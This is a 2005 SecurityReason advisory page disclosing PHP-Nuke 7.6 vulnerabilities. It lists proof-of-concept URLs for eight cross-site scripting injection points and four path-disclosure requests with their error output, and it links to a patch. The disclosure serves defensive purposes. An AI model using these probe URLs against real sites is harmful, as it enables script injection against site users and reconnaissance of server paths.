Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityReason Advisory

  Topic : PHPNuke x=>7.6 Multiple vulnerabilities PART 1
  SecurityAlert : 11
  SecurityRisk : Low  alert  (About)
  Remote Exploit : Yes
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : Maksymilian Arciemowicz
  Date : 07.09.2005

  Affected Software : PHPNuke x=>7.6

  Advisory Text :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PhpNuke 7.6=>x Multiple vulnerabilities cXIb8O3.12]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 3.3.2005
from securityreason.com TEAM

- --- 0. For ---
This adv. is only for John Poul II, Polish Pope.
Peace!

- --- 1.Description ---
PHP-Nuke is a Web Portal System, storytelling software, news system, online
community or whatever you want to call it. Its goal is to have an automated
web site to distribute news and articles with user system. Each user can
submit comments to discuss the articles, similar to Slashdot and many
others. Features: web admin, polls/surveys with comment, statistics, user
customizable box, themes manager, friendly admin GUI, moderation system,
sections manager, banner system, backend/headlines generation, Yahoo like
search engine, Ephemerids manager, file manager, download manager, faq
manager, advanced blocks system, reviews system, newsletter, content
management, encyclopedia generator, md5 password encryption, phpBB Forums
integration, support for 25 languages, 100% modular and more. Written 100%
in PHP and requires Apache, PHP and a SQL Database Server. Supports MySQL,
PostgreSQL, Adabas, mSQL and many others.


- --- 2. XSS ---
2.0
http://[HOST]/[DIR]/banners.php?op=EmailStats&name=sex&bid=[XSS]

2.1
http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&
ratetype=num

2.2
http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3C
h1%3E50&ratetype=num

2.3
http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkdetails&ttitle=
[XSS]

2.4
http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkeditorial&ttitl
e=[XSS]

2.5
http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkcomments&ttitle
=[XSS]

2.6
http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS]

2.7
http://[HOST]/[DIR]/modules.php?name=Your_Account&op=userinfo&bypass=1&user
name=[XSS]

- --- 3. Path Disclousure ---

3.0
http://[HOST]/[DIR]/modules.php?name=Surveys&file=comments

Error message :
- ---------------
Fatal error: Call to undefined function OpenTable() in
/www/phpnuke/76/html/modules/Surveys/comments.php on line 99
- ---------------

3.1
http://[HOST]/[DIR]/modules.php?name=Surveys&file=comments&op=showreply

Error message :
- ---------------
Fatal error: Call to undefined function OpenTable() in
/www/phpnuke/76/html/modules/Surveys/comments.php on line 99
- ---------------

3.2
http://[HOST]/[DIR]/modules.php?name=Surveys&file=comments&op=DisplayTopic

Error message :
- ---------------
Fatal error: Call to undefined function OpenTable() in
/www/phpnuke/76/html/modules/Surveys/comments.php on line 99
- ---------------

3.3
http://[HOST]/[DIR]/themes/3D-Fantasy/theme.php

Error message :
- ---------------
Warning: main(themes/3D-Fantasy/tables.php) [function.main]: failed to open
stream: No such file or directory in
/www/phpnuke/76/html/themes/3D-Fantasy/theme.php on line 41

Warning: main() [function.include]: Failed opening
'themes/3D-Fantasy/tables.php' for inclusion (include_path='.:') in
/www/phpnuke/76/html/themes/3D-Fantasy/theme.php on line 41
- ---------------

- --- 4. How to fix ---
Because phpnuke don't have security contact, you can download my patch from
securityreason.com
http://securityreason.com/patch/PhpNuke-7.6-adv.by.cXIb8O3.12-patch.tar.gz

- --- 5.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
securityreason.com TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCUGDxznmvyJCR4zQRArUvAKCowKgAMyjnM3AdIs8hw7H460ywYQCeMDwQ
F5KMVg1nZoyoMtjd0bC4Rkg=
=aEGl
-----END PGP SIGNATURE-----

Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

» Apache-SSL memory
   disclosure

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.